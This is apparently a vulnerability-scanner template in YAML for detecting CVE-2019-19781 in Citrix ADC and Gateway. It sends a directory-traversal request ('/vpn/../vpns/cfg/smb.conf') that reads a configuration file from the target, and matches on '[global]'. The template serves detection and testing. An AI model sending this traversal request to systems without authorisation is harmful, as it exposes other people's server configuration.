19 lines
513 B
YAML
19 lines
513 B
YAML
id: CVE-2019-19781
|
|
|
|
info:
|
|
name: Citrix ADC Directory Traversal
|
|
author: organiccrap
|
|
severity: high
|
|
description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
|
|
reference: https://support.citrix.com/article/CTX267027
|
|
tags: cve,cve2019,citrix,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "[global]"
|